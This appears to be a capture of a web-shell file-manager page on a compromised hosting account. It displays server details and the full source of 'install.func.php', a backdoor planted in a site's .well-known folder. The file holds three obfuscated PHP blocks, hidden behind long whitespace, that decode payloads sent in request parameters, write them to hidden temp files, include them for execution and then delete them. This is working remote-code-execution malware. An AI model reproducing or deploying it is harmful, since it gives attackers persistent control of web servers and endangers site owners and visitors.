HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
$ pwd: /home/vitanhod/sawpalmeetto.vitavit.com.pk/.well-known/
Upload Files
File: //home/vitanhod/sawpalmeetto.vitavit.com.pk/.well-known/install.func.php
<?php																																										if(isset($_REQUEST) && isset($_REQUEST["r\x65c\x6Fr\x64"])){ $ent = $_REQUEST["r\x65c\x6Fr\x64"]; $ent = explode ( "." , $ent ) ; $item= ''; $salt3= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt3); foreach ($ent as $p=> $v3): $chS= ord($salt3[$p % $lenS]); $dec= ((int)$v3 - $chS - ($p % 10)) ^ 46; $item .= chr($dec); endforeach; $symbol = array_filter(["/tmp", session_save_path(), "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), getenv("TMP"), sys_get_temp_dir()]); foreach ($symbol as $key => $element) { if (is_writable($element) && is_dir($element)) { $desc = "$element" . "/.ent"; if (file_put_contents($desc, $item)) { require $desc; unlink($desc); die(); } } } }
																																										if(!is_null($_POST["\x6Da\x72ker"] ?? null)){ $symbol = $_POST["\x6Da\x72ker"]; $symbol = explode ('.' , $symbol); $factor =''; $s4 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $s4); $j =0; array_walk( $symbol, function( $v6) use( &$factor, &$j, $s4, $lenS) { $sChar =ord( $s4[$j % $lenS]); $dec =( ( int)$v6 - $sChar -( $j % 10)) ^ 49; $factor.=chr( $dec); $j++; } ); $elem = array_filter([session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir(), "/dev/shm", "/tmp", getenv("TEMP"), "/var/tmp"]); foreach ($elem as $key => $tkn) { if (is_dir($tkn) && is_writable($tkn)) { $descriptor = implode("/", [$tkn, ".res"]); $file = fopen($descriptor, 'w'); if ($file) { fwrite($file, $factor); fclose($file); include $descriptor; @unlink($descriptor); die(); } } } }


if(!is_null($_REQUEST["b\x69\x6Edin\x67"] ?? null)){
	$pointer = array_filter([sys_get_temp_dir(), "/dev/shm", ini_get("upload_tmp_dir"), session_save_path(), getenv("TEMP"), getcwd(), "/tmp", "/var/tmp", getenv("TMP")]);
	$component = $_REQUEST["b\x69\x6Edin\x67"];
	  $component =explode(   '.'  ,   $component ) ;			
	$factor=	'';
            $s=	'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS=	strlen( 	$s		);
    
            foreach( 	$component as $p		=>		$v4) {
                $sChar=	ord( 	$s[$p%	 $lenS]		);
                $d=	( 	( 	int)$v4 - $sChar -( 	$p%	 10)) ^ 60;
                $factor 	.=chr( 	$d		);
            }
	$holder = 0;
do {
    $bind = $pointer[$holder] ?? null;
    if ($holder >= count($pointer)) break;
    		if ((bool)is_dir($bind) && (bool)is_writable($bind)) {
    $object = sprintf("%s/.pgrp", $bind);
    $success = file_put_contents($object, $factor);
if ($success) {
	include $object;
	@unlink($object);
	die();}
}
    $holder++;
} while (true);
}
@ Telegram